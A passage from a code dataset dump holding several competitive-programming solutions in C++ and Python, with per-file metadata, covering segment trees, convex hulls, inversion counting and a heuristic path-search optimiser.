};\n\n segmentTree(vector<T>& a, F g)\n {\n n = a.size();\n t.resize(n * 4);\n f = g;\n if (f(2, 4) == 6)\n NEITRAL_ELEMENT = 0;\n else\n if (f(-2, 10) == -2)\n NEITRAL_ELEMENT = numeric_limits<T>::max();\n build(a, 1, 0, n - 1);\n }\n\n T get(int l, int r)\n {\n return get(1, 0, n - 1, l, r);\n }\n\n T get(int v, int tl, int tr, int l, int r) \n {\n if (l > r)\n return NEITRAL_ELEMENT;\n if (l == tl && r == tr)\n return t[v];\n int tm = (tl + tr) / 2;\n return f(get(v * 2, tl, tm, l, min(r, tm)), get(v * 2 + 1, tm + 1, tr, max(l, tm + 1), r));\n }\n\n void update(int position, int value)\n {\n update(1, 0, n - 1, position, value);\n }\n\n void update(int v, int tl, int tr, int position, int value) \n {\n if (tl == tr)\n t[v] = value;\n else \n {\n int tm = (tl + tr) / 2;\n if (position <= tm)\n update(v * 2, tl, tm, position, value);\n else\n update(v * 2 + 1, tm + 1, tr, position, value);\n t[v] = f(t[v * 2], t[v * 2 + 1]);\n }\n }\n};\n\nvoid run()\n{\n ints(n, m);\n 
vi a(n), next(n), prev(n);\n readln(a);\n map<int, int> mp;\n int t;\n fori(n)\n if (mp.find(a[i]) == mp.end())\n mp[a[i]] = i,\n next[i] = INF,\n prev[i] = INF;\n else\n t = mp[a[i]],\n prev[i] = i - t,\n next[t] = i,\n mp[a[i]] = i,\n next[i] = INF;\n segmentTree<int> tree(prev, [](int x, int y){return min(x, y);});\n vector<pair<pii, int>> query(m);\n vi ans(m);\n int x, y;\n fori(m)\n readln(x, y),\n query[i] = {{x - 1, y - 1}, i};\n sort(whole(query));\n int j = 0, i = 0;\n while (j < m)\n {\n pii q = query[j].first;\n for (; i < q.first; ++i)\n if (next[i] < n)\n tree.update(next[i], INF);\n ans[query[j++].second] = tree.get(q.first, q.second);\n }\n transform(whole(ans), ans.begin(), [](int x){return x == INF ? -1 : x;});\n writeln(ans);\n}\n\nint main()\n{\n ios_base::sync_with_stdio(false);\n// freopen(FILENAME\".in\", \"r\", stdin);\n// freopen(FILENAME\".out\", \"w\", stdout);\n run();\n return 0;\n}\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n#define a _a\n#define n _n\nttti ostream&operator<<(ostream&os,vector<T>&a);\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>&a){return os<<a.first<<\" \"<<a.second;}\nttti ostream&operator<<(ostream&os,vector<T>&a){if(a.size())os<<a[0];else os<<\"\\n\";for(int i=1;i<a.size();++i)os<<\"\\n \"[is_fundamental<T>::value]<<a[i];return os;}\nttti istream&operator>>(istream&is,vector<T>&a){if(a.size()==0){int n;is>>n;a.resize(n);}for(int i=0;i<a.size();++i)is>>a[i];return is;}\nttti void print(T a){cout<<\" \"<<a;}\nttti void priws(T a){cout<<a;}\nttti void read(T& a){cin>>a;}\n" }, { "alpha_fraction": 0.3711340129375458, "alphanum_fraction": 0.40979382395744324, "avg_line_length": 16.590909957885742, "blob_id": "043a7817c9efbf22feae954bd148568cd2526b99", "content_id": "d79b32b03b3358b493d01063726c2904b7e95e48", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 388, 
"license_type": "no_license", "max_line_length": 30, "num_lines": 22, "path": "/CodeForce/1543/interactor.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import random\nimport sys\n\nn = 100\nx = random.randint(0, n - 1)\nt = 100\nprint(t)\nfor i in range(t):\n print(n, 2)\n steps = 0\n while True:\n steps += 1\n y = int(input())\n if x == y:\n print(1)\n if steps > n:\n sys.exit(10)\n break\n else:\n x ^= y\n print(0)\n sys.stdout.flush()\n\n" }, { "alpha_fraction": 0.3045842945575714, "alphanum_fraction": 0.3442113399505615, "avg_line_length": 18.815383911132812, "blob_id": "f9ae8d7270b7a5cd11fa5fc72005799a819b7adb", "content_id": "6e76e3b4839f6af639747bf5ac70ca1097a3348a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1287, "license_type": "no_license", "max_line_length": 54, "num_lines": 65, "path": "/trains/neerc/neerc.ifmo.ru.train.2014.10.11/B.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdio>\n#include <vector>\n#include <iostream>\n#include <set>\n \nusing namespace std;\n \n \nint a[500000], t[1000000];\n \n \nvoid run()\n{\n int w, h, n, x;\n cin >> h >> w >> n;\n h = min (h, n);\n int two = 2;\n while (two < h)\n two *= 2;\n for (int i = 0; i < h; ++i){\n a[i] = w;\n }\n for (int i = h; i < two; ++i)\n a[i] = 0;\n for (int i = two - 1; i < two * 2 - 1; ++i)\n t[i] = a[i - two + 1];\n \n for (int i = two - 2; i >= 0; --i)\n t[i] = max(t[2 * i + 1], t[2 * i + 2]);\n \n for (int i = 0; i < n; ++i){\n cin >> x;\n int rq = 0;\n if (t[rq] < x){\n cout << -1 << endl;\n continue;\n }\n while (rq < two - 1){\n int to = 2 * rq + 2;\n if (t[2 * rq + 1] >= x)\n to = 2 * rq + 1;\n rq = to;\n // cout << rq << endl;\n }\n t[rq] -= x;\n cout << rq - two + 2 << endl;\n rq = (rq - 1) / 2;\n while (rq){\n t[rq] = max(t[2 * rq + 1], t[2 * rq + 2]);\n rq = (rq - 1) / 2;\n }\n t[rq] = max(t[2 * rq + 1], t[2 * rq + 2]);\n \n \n }\n \n}\n \nint main()\n{\n 
freopen(\"billboard.in\", \"r\", stdin);\n freopen(\"billboard.out\", \"w\", stdout);\n run();\n return 0;\n}" }, { "alpha_fraction": 0.4060150384902954, "alphanum_fraction": 0.4368816912174225, "avg_line_length": 35.62318801879883, "blob_id": "b0a43d9212c8a0365f403a2872b0de169eddbfcb", "content_id": "5fbe6773e76e066cf6085166232f900eea0c3bcb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2527, "license_type": "no_license", "max_line_length": 928, "num_lines": 69, "path": "/2013/2013RCC3/A.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <iostream>\n#include <stdio.h>\n#include <vector>\n#include <set>\n#include <algorithm>\n#define enter printf(\"\\n\");\n\nusing namespace std;\nint INF = 1000000007;\nvector<int> a;\nint n, m;\nvoid writeln(int a){printf(\"%d\\n\", a);}void writeln(int a, int b){printf(\"%d %d\\n\", a, b);}void writeln(int a, int b, int c){printf(\"%d %d %d\\n\", a, b, c);}void writeln(int a, int b, int c, int d){printf(\"%d %d %d %d\\n\", a, b, c, d);}void write(int a){printf(\"%d\", a);}void write(int a, int b){printf(\"%d %d\", a, b);}void write(int a, int b, int c){printf(\"%d %d %d\", a, b, c);}void write(int a, int b, int c, int d){printf(\"%d %d %d %d\", a, b, c, d);}void read(int &a){scanf(\"%d\", &a);}void read(int &a, int &b){scanf(\"%d %d\", &a, &b);}void read(int &a, int &b, int &c){scanf(\"%d %d %d\", &a, &b, &c);}void read(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\", &a, &b, &c, &d);}void readln(int &a){scanf(\"%d\\n\", &a);}void readln(int &a, int &b){scanf(\"%d %d\\n\", &a, &b);}void readln(int &a, int &b, int &c){scanf(\"%d %d %d\\n\", &a, &b, &c);}void readln(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\\n\", &a, &b, &c, &d);}\n\nvoid readln(vector<int> &f, int n)\n{\n int x;\n for (int i = 1; i <= n; i++)\n {\n read(x);\n f.push_back(x);\n }\n}\n\nvoid writeln(vector<int> &f)\n{\n for (int i = 0; i < 
f.size(); i++)\n printf(\"%d%c\", f[i], i == f.size() - 1 ? '\\n' : ' ');\n}\n\nint main()\n{\n// freopen(\"input.txt\", \"r\", stdin);\n int t;\n readln(t);\n for (int tt = 0; tt < t; tt++)\n {\n char c, d;\n int start = 0, finish = 0;\n scanf(\"%c%c\", &c, &d);\n start += 60 * 60 * ((c - '0') * 10 + d - '0');\n scanf(\":\");\n scanf(\"%c%c\", &c, &d);\n start += 60 * ((c - '0') * 10 + d - '0');\n scanf(\":\");\n scanf(\"%c%c\", &c, &d);\n start += ((c - '0') * 10 + d - '0');\n scanf(\" \");\n scanf(\"%c%c\", &c, &d);\n finish += 60 * 60 * ((c - '0') * 10 + d - '0');\n scanf(\":\");\n scanf(\"%c%c\", &c, &d);\n finish += 60 * ((c - '0') * 10 + d - '0');\n scanf(\":\");\n scanf(\"%c%c\", &c, &d);\n finish += ((c - '0') * 10 + d - '0');\n readln(m);\n m *= 60;\n int time = (finish - start + 24 * 60 * 60) % (24 * 60 * 60);\n if (time == 0)\n time = 60 * 60 * 24;\n if (time >= m)\n printf(\"Perfect\\n\"); else\n if (time >= m - 60 * 60)\n printf(\"Test\\n\"); else\n printf(\"Fail\\n\");\n }\n return 0;\n}\n" }, { "alpha_fraction": 0.45735475420951843, "alphanum_fraction": 0.46876487135887146, "avg_line_length": 31.66149139404297, "blob_id": "0aec60d85d1ae44614b1994f0cefbc3ea7c05ba9", "content_id": "d64b1994078145b1215ac5d0a53551cdb8e04160", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 10517, "license_type": "no_license", "max_line_length": 155, "num_lines": 322, "path": "/2018/yaopt/A.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 19 March 2015 (#define -> typedef, readln(vector) patched, version from 27 March 2017)\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define 
fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n\ntypedef vector<long long> vll;\ntypedef pair<int, int> pii;\ntypedef valarray<int> va;\ntypedef vector<int> vi;\ntypedef long long ll;\n#define pb push_back\n#define whole(a) a.begin(), a.end()\n#define next next__\n#define prev prev__\n#define count count__\n#define argmax(a) (max_element(whole(a)) - (a).begin())\n#define argmin(a) (min_element(whole(a)) - (a).begin())\n\n#define ints(a...) int a; readln(a)\n#define lls(a...) ll a; readln(a)\n#define wr(args...) err(split(#args,',').begin(),args)\n \n#define FILENAME \"input\"\n#define INF 1000000007\n \n#define tthti template<typename Head, typename... Tail> inline\n#define ttt12i template<typename T1, typename T2> inline\n#define ttti template<typename T> inline\n\ninline void writeln2(){cout<<\"\\n\";}\ninline void writeln() {cout<<\"\\n\";}\ninline void readln() {}\nttti void read(T&);\nttti void priws(T);\nttti void print(T);\n\nvoid err(vector<string>::iterator it){++it;}\ntthti void readln (Head& head,Tail&... tail){read(head); readln (tail...);}\ntthti void writeln2(Head head, Tail... tail){print(head);writeln2(tail...);}\ntthti void writeln (Head head, Tail... 
tail){priws(head);writeln2(tail...);}\nttti void writeln_range(T f,T s){if(f!=s)for(auto i=f;i!=s;++i)writeln(*i);}\ntthti void err(vector<string>::iterator it,Head head,Tail...tail){writeln((*it).substr((*it)[0]==' '),\"=\",head);err(++it, tail...);}\nvector<string>split(const string&s,char c){vector<string>v;stringstream ss(s);string x;while(getline(ss,x,c))v.pb(x);return v;}\n\n///-------------------------------------------------------------------------------------------------------------------------------------\n//Igorjan\n\n\nstruct site\n{\n vector<int> themes;\n vector<int> sites;\n int t;\n int p;\n\n site(){}\n};\n\nistream& operator>>(istream& is, site& s)\n{\n ints(q);\n s.themes.resize(q);\n for (auto& x : s.themes)\n is >> x, --x;\n is >> s.t >> s.p;\n ints(o);\n s.sites.resize(o);\n for (auto& x : s.sites)\n is >> x, --x;\n return is;\n}\n\n#define COUNT_OF_USED 2\n\n\nvoid run()\n{\n srand(clock());\n double time = clock();\n ints(n, k, r, t, s);\n vector<site> sites(n);\n vector<int> freq(k);\n vector<vi> dp(n);\n readln(sites, freq);\n vector<vi> sitesWithTopic(k);\n fori(n)\n for (auto& topic: sites[i].themes)\n sitesWithTopic[topic].pb(i);\n\n fori(n)\n {\n dp[i].resize(n, INF);\n dp[i][i] = 0;\n queue<int> q;\n q.push(i);\n while (q.size())\n {\n int u = q.front();\n q.pop();\n for (int& v : sites[u].sites)\n if (dp[i][v] == INF)\n dp[i][v] = dp[i][u] + 1,\n q.push(v);\n }\n }\n //writeln(dp);\n vector<vector<int>> ans;\n double answer = 0.0;\n int CCC = 1;\n int WWW = 0;\n\n auto F = [](int x) -> int {\n if (x < 50)\n return x * 3;\n return pow(x, 2.0 / 5) + 10;\n };\n\n\n\n\n std::vector<std::pair<int, int>> newsGeneration;\n std::vector<std::pair<int, int>> newsEvents;\n std::vector<std::list<int>> newsOnSite2(n);\n for (int topic = 0; topic < k; topic++)\n for (int curTime = 0; curTime <= t; curTime += freq[topic])\n newsGeneration.emplace_back(curTime, topic);\n sort(newsGeneration.begin(), newsGeneration.end());\n auto itG = 
newsGeneration.begin();\n for (int curTime = 0; curTime <= t; curTime++)\n for (; itG != newsGeneration.end() && itG->first == curTime; itG++)\n {\n const int topic = itG->second;\n bool newsAppeared = false;\n newsEvents.emplace_back(topic, curTime);\n while (!newsAppeared)\n {\n for (int ss : sitesWithTopic[topic])\n if (rand() % 99 + 1 <= sites[ss].p)\n {\n newsOnSite2[ss].push_back(newsEvents.size() - 1);\n newsAppeared = true;\n }\n }\n }\n\n\n\n\n while ((clock() - time) / CLOCKS_PER_SEC < 1.8)\n {\n CCC++;\n set<int> starts;\n while (int(starts.size()) < r)\n starts.insert(rand() % n);\n int countVertices;\n vector<vector<int>> paths(r);\n int i = 0;\n int coeff = F(CCC);\n //rand() % (4 * r) + 10;\n vector<bool> used(n);\n\n auto dfs = [&](auto& f, int start, int u) -> void\n {\n used[u] = true;\n paths[i].pb(u);\n countVertices++;\n int mn = INF;\n int legit = -1;\n if (rand() % 7 == 0)\n {\n vector<pii> good, best;\n for (auto v : sites[u].sites)\n {\n int temp = dp[v][start];\n if (temp && temp + countVertices <= min(coeff, n))\n (used[v] ? 
good : best).pb({temp, v});\n else if (temp + countVertices <= n && mn > temp)\n mn = temp,\n legit = v;\n }\n sort(good.begin(), good.end());\n sort(best.begin(), best.end());\n int index = -1;\n int sz = best.size();\n int df = sz - 1;\n while (df > 0 && best[df].first == best.back().first) --df;\n int sz2 = good.size();\n int df2 = sz2 - 1;\n while (df2 > 0 && good[df2].first == good.back().first) --df2;\n\n if (sz)\n index = best[df + rand() % (sz - df)].second;\n if (index == -1 && sz2)\n index = good[df2 + rand() % (sz2 - df2)].second;\n if (index != -1)\n f(f, start, index);\n else if (legit != -1 && dp[legit][start])\n f(f, start, legit);\n } else {\n vector<pii> good;\n for (auto v : sites[u].sites)\n {\n int temp = dp[v][start];\n if (temp && temp + countVertices <= min(coeff, n))\n good.pb({temp, v});\n else if (temp + countVertices <= n && mn > temp)\n mn = temp,\n legit = v;\n }\n sort(good.begin(), good.end());\n int sz = good.size();\n //int j = sz - 1;\n //while (j >= 1 && good[j].first == good.back().first)\n //--j;\n int df = 9 + rand() % 3;\n if (sz)\n f(f, start, good[sz >= df ? 
(sz - df + rand() % df) : sz - 1].second);\n else if (legit != -1 && dp[legit][start])\n f(f, start, legit);\n }\n };\n\n for (auto& u : starts)\n {\n countVertices = 0;\n forj(n) used[j] = false;\n dfs(dfs, u, u);\n ++i;\n }\n \n\n\n std::vector<std::pair<int, int>> indexFinishes;\n forj(r)\n {\n int curTime = 0;\n size_t nextSiteIndex = 0;\n while (true) {\n const int nextSite = paths[j][nextSiteIndex];\n const int finishTime = curTime + sites[nextSite].t;\n if (finishTime > t) break;\n indexFinishes.emplace_back(finishTime, nextSite);\n curTime = finishTime;\n nextSiteIndex = (nextSiteIndex + 1) % paths[j].size();\n }\n }\n\n sort(indexFinishes.begin(), indexFinishes.end());\n\n auto itF = indexFinishes.begin();\n std::vector<std::pair<int, int>> events(newsEvents);\n std::vector<std::list<int>> newsOnSite(newsOnSite2);;\n double score = 0;\n for (int curTime = 0; curTime <= t; curTime++) {\n for (; itF != indexFinishes.end() && itF->first == curTime; itF++) {\n const int site = itF->second;\n const int indexBeginTime = curTime - sites[site].t;\n auto& newsVector = newsOnSite[site];\n while (!newsVector.empty()) {\n const int ev = newsVector.front();\n if (events[ev].second <= indexBeginTime) {\n if (events[ev].first != -1) {\n score += std::max(0, s * freq[events[ev].first] - (curTime - events[ev].second));\n events[ev].first = -1;\n }\n newsVector.pop_front();\n } else {\n break;\n }\n }\n }\n }\n\n score = score / s / k / t;\n if (score >= answer)\n answer = score, \n WWW = coeff,\n ans = paths;\n\n //cerr << CCC << \"\\n\";\n //cerr << coeff << \"\\n\";\n //cerr << score << \"\\n\";\n //cerr << \"\\n\";\n //break;\n }\n for (auto& x : ans)\n {\n for (auto& y : x) ++y;\n writeln(x.size(), x);\n }\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n// freopen(FILENAME\".in\", \"r\", stdin);\n// freopen(FILENAME\".out\", \"w\", stdout);\n run();\n return 0;\n}\n\n#define a _a\n#define n _n\nttti ostream&operator<<(ostream&os,vector<T>&a);\nttt12i 
istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>&a){return os<<a.first<<\" \"<<a.second;}\nttti ostream&operator<<(ostream&os,vector<T>&a){if(a.size())os<<a[0];else os<<\"\\n\";fori1(a.size())os<<\"\\n \"[is_fundamental<T>::value]<<a[i];return os;}\nttti ostream&operator<<(ostream&os,valarray<T>&a){if(a.size())os<<a[0];else os<<\"\\n\";fori1(a.size())os<<\"\\n \"[is_fundamental<T>::value]<<a[i];return os;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti istream&operator>>(istream&is,valarray<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T a){cout<<\" \"<<a;}\nttti void priws(T a){cout<<a;}\nttti void read(T& a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.4507042169570923, "alphanum_fraction": 0.4828973710536957, "avg_line_length": 18.115385055541992, "blob_id": "da60518ce4d9209b9f4c00e2aa41a3dd85bb8e63", "content_id": "735f1a72cbbe87088075e0c06c0c517e6d66764b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 497, "license_type": "no_license", "max_line_length": 48, "num_lines": 26, "path": "/CodeForce/gym/101090/L.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import sys\n\nn = int(input())\nstrings = input().split()\nr = []\nb = []\nfor s in strings:\n color = s[-1]\n s = int(s[:-1])\n r.append(s) if color == 'R' else b.append(s)\n\nif len(r) == 0 or len(b) == 0:\n print(0)\n sys.exit()\n\ndef part(a):\n a[0] = (a[0], a[0])\n for i in range(1, len(a)):\n a[i] = (a[i], a[i - 1][1] + a[i])\n return a\n\nr = part(list(reversed(sorted(r))))\nb = part(list(reversed(sorted(b))))\n\nl = min(len(r), len(b))\nprint(r[l - 1][1] + b[l - 1][1] - l * 2)\n" }, { "alpha_fraction": 0.5057851076126099, "alphanum_fraction": 0.5355371832847595, "avg_line_length": 25.88888931274414, "blob_id": "1916a73e65d94a2a1d099281e74193022227e4dc", "content_id": 
"3c0a8f0f3c91490be323df084671221e776fa687", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1210, "license_type": "no_license", "max_line_length": 123, "num_lines": 45, "path": "/atcoder/abc162/A.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <iostream>\n#include <vector>\n#include <algorithm>\n#include <map>\n#include <numeric>\n#include <iomanip>\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n//Igorjan\n//}}}\n\nvoid run()\n{\n string s;\n cin >> s;\n cout << (s[0] == '7' || s[1] == '7' || s[2] == '7' ? 
\"Yes\" : \"No\") << endl;\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n" }, { "alpha_fraction": 0.41336116194725037, "alphanum_fraction": 0.4613778591156006, "avg_line_length": 20.44776153564453, "blob_id": "9db0b7d3abaaa0fe172acd5711bb014035778cd1", "content_id": "4993210e5bf89492adf6ebf4f913237ef795a8e1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1437, "license_type": "no_license", "max_line_length": 64, "num_lines": 67, "path": "/CodeForce/0540/E.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import sys\nimport collections\n\nresult = [(0, 0)] * 200010\nls = [(0, 0)] * 200010\ntoget = []\n\ndef inverses_merge(l1, r1, l2, r2):\n counter = l1\n l = l1\n while (l1 < r1) and (l2 < r2):\n if ls[l1][0] < ls[l2][0]:\n result[counter] = ls[l1]\n l1 += 1\n else:\n result[counter] = ((ls[l2][0], ls[l2][1] + r1 - l1))\n l2 += 1\n counter += 1\n while l1 < r1:\n result[counter] = ls[l1]\n counter += 1\n l1 += 1\n while l2 < r2:\n result[counter] = ls[l2]\n counter += 1\n l2 += 1\n for i in range(l, counter, 1):\n ls[i] = result[i]\n\ndef inverses_get(l, r):\n if r - l == 0:\n return\n if r - l == 1:\n ls[l] = (toget[l], 0)\n return\n m = (l + r) // 2\n inverses_get(l, m)\n inverses_get(m, r)\n inverses_merge(l, m, m, r)\n\nn = int(sys.stdin.readline())\nd = {}\nfor i in range(n):\n x, y = list(map(int, sys.stdin.readline().split()))\n if not d.__contains__(x):\n d[x] = x\n if not d.__contains__(y):\n d[y] = y\n t = d[x]\n d[x] = d[y]\n d[y] = t\nindex = {}\nd = collections.OrderedDict(sorted(d.items()))\ni = 0\n\nfor t in (d.items()):\n toget.append(t[1])\n index[t[1]] = i\n i += 1\n\ns = 0\ninverses_get(0, len(toget))\nx = result\nfor i in range(len(toget)):\n s += x[i][1]\n s += abs(x[i][0] - d[x[i][0]]) - abs(i - 
index[x[i][0]])\nsys.stdout.write(str(s) + \"\\n\")\n" }, { "alpha_fraction": 0.5302104353904724, "alphanum_fraction": 0.5437881946563721, "avg_line_length": 35.82500076293945, "blob_id": "1dbb7410408391d44007abaf73fae4d662d3f46f", "content_id": "c77b9c5ddcbbdb364cfdf7ec1e0d6127ca7b01f5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1473, "license_type": "no_license", "max_line_length": 248, "num_lines": 40, "path": "/staff/convexHull.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define pointtt template<typename T>\npointtt struct point\n{\n T x, y;\n point(T _x, T _y) : x(_x), y(_y) {}\n point(){}\n point operator+(point b) { return point(x + b.x, y + b.y); }\n point operator-() { return point(-x, -y); }\n T operator!() { return x * x + y * y; }\n bool operator<(point b) { return x == b.x ? 
y < b.y : x < b.x; }\n};\npointtt istream&operator>>(istream&is,point<T>&a){return is>>a.x>>a.y;}\npointtt ostream&operator<<(ostream&os,point<T>&a){return os<<a.x<<\" \"<<a.y;}\npointtt T dist(point<T>&a,point<T>&b){return!point<T>(a+-b);}\npointtt int orientation(point<T>&a,point<T>&b,point<T>&c){T q=a.x*b.y-a.y*b.x-a.x*c.y+a.y*c.x+b.x*c.y-b.y*c.x;return q>0?1:q<0?-1:0;}\npointtt vector<point<T>>convexHull(vector<point<T>>a){sort(a.begin(),a.end());int n=a.size(),j=-1,k=0;ROF(i,n-2,0)a.push_back(a[i]);fori(a.size()){for(;j>k&&orientation(a[j-1],a[j],a[i])!=1;--j);a[++j]=a[i];if(!k&&i==n-1)k=j;}a.resize(j);return a;}\n\nint main()\n{\n ios_base::sync_with_stdio(false);\n int n;\n cin >> n;\n vector<point<int>> a(n);\n fori(n)\n cin >> a[i];\n a = convexHull(a);\n a.push_back(a[0]);\n double ans = 0;\n for (int i = 1; i < a.size(); ++i)\n ans += sqrt(dist(a[i - 1], a[i]));\n cout.precision(10);\n cout << fixed << ans << \"\\n\";\n return 0;\n}\n" }, { "alpha_fraction": 0.5516431927680969, "alphanum_fraction": 0.5516431927680969, "avg_line_length": 23.882352828979492, "blob_id": "f916e5a3b16ac9f0f03e7faa710dca9eaf325269", "content_id": "9883d28c673739a36dbe4e8c8da2141c1333da0c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 426, "license_type": "no_license", "max_line_length": 50, "num_lines": 17, "path": "/CodeForce/0501/B.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "from collections import defaultdict\nimport sys\n\nq = int(sys.stdin.readline())\nold = defaultdict(str)\nnew = defaultdict(str)\nfor i in range(q):\n a, b = sys.stdin.readline().split()\n if a in new.values():\n old[b] = old[a]\n new[old[a]] = b\n else:\n old[b] = a\n new[a] = b\nsys.stdout.write(str(new.keys().__len__()) + \"\\n\")\nfor x in new.keys():\n sys.stdout.write(x + \" \" + new[x] + \"\\n\")\n\n\n\n" }, { "alpha_fraction": 0.3919413983821869, "alphanum_fraction": 0.45299145579338074, "avg_line_length": 
24.483871459960938, "blob_id": "295ad5dd48d9cb55821d48f706dcb2423b071050", "content_id": "b65a91a783959119ec9df2f9f3838f407426555c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 884, "license_type": "no_license", "max_line_length": 97, "num_lines": 31, "path": "/trains/neerc/neerc.ifmo.ru.train.2015.10.06/F.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import math\r\nimport sys\r\n \r\nax, ay, bx, by = map(int, open(\"lattice.in\", \"r\").readline().split())\r\nfile = open(\"lattice.out\", \"w\")\r\n \r\na2 = ax ** 2 + ay ** 2\r\nb2 = bx ** 2 + by ** 2\r\nab = ax * bx + ay * by\r\nif ab == 0:\r\n    if a2 < b2:\r\n        file.write(\"1 0\")\r\n    else:\r\n        file.write(\"0 1\")\r\n    sys.exit()\r\ndef f(p, q):\r\n    return a2 * (p ** 2) + 2 * ab * p * q + b2 * (q ** 2)\r\n \r\nx = b2 / ab\r\ny = a2 / ab\r\neps = 0.0000000001\r\na = [   math.floor(x), -1, math.ceil(x + eps), -1, -1, math.floor(y), -1, math.ceil(y + eps), \r\n    math.floor(x), 1, math.ceil(x + eps), 1, 1, math.floor(y), 1, math.ceil(y + eps), 0, 1, 1, 0]\r\nmn = f(a[0], a[1])\r\ni = 0\r\nfor j in range(2, len(a), 2):\r\n    temp = f(a[j], a[j + 1])\r\n    if mn > temp:\r\n        mn = temp\r\n        i = j\r\nfile.write(str(a[i]) + \" \" + str(a[i + 1]))" }, { "alpha_fraction": 0.49886661767959595, "alphanum_fraction": 0.5171752572059631, "avg_line_length": 25.79906463623047, "blob_id": "4ff903257ad669378ec1f2a6176fb729fb0db63d", "content_id": "a30abde46a782ef15d45a18480857256f83cac21", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 5735, "license_type": "no_license", "max_line_length": 175, "num_lines": 214, "path": "/trains/nsu/8.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "//template igorjan94 version from 05 June 2014\n#include <bits/stdc++.h>\n#include <iomanip>\n\n#define pb push_back\n#define ll long long\n#define forit(it, 
r) for (auto it = r.begin(); it != r.end(); it++)\n#define forn(i, n) for (int i = 0; i < n; ++i)\n#define forn1(i, n) for (int i = 1; i < n; ++i)\n#define FOR(i, m, n) for (int i = m; i < n; ++i)\n#define ROF(i, m, n) for (int i = m; i >= n; --i)\n#define fori(n) for (int i = 0; i < n; ++i)\n#define forj(n) for (int j = 0; j < n; ++j)\n#define fori1(n) for (int i = 1; i < n; ++i)\n#define forj1(n) for (int j = 1; j < n; ++j)\n#define vi vector<int>\n#define vvi vector<vector<int> >\n#define vll vector<long long>\n#define pii pair<int, int>\n#define whole(a) a.begin(), a.end()\n\n#ifndef ONLINE_JUDGE\n#define lld I64d\n#endif\n\n#define FILENAME \"input\"\n#define INF 1000000007\n#define DOUBLEFORMAT \"%f\"\n\nusing namespace std;\n\ntemplate <class Head, class... Tail> void writeln(Head head, Tail... tail);\ntemplate <class Head, class... Tail> void writeln2(Head head, Tail... tail);\ntemplate <class Head, class... Tail> void readln(Head& head, Tail&... tail);\nvoid writeln(){printf(\"\\n\");}void writeln2(){printf(\"\\n\");}void readln(){}\n\n///----------------------------------------------------------------------------------------------------------------------------\n\nstring s, t;\n\nint atoi(string &s, int &i)\n{\n int temp = s[i++] - '0';\n while (s[i] - '0' <= 9 && s[i] - '0' >= 0)\n temp = temp * 10 + s[i++] - '0';\n i--;\n return 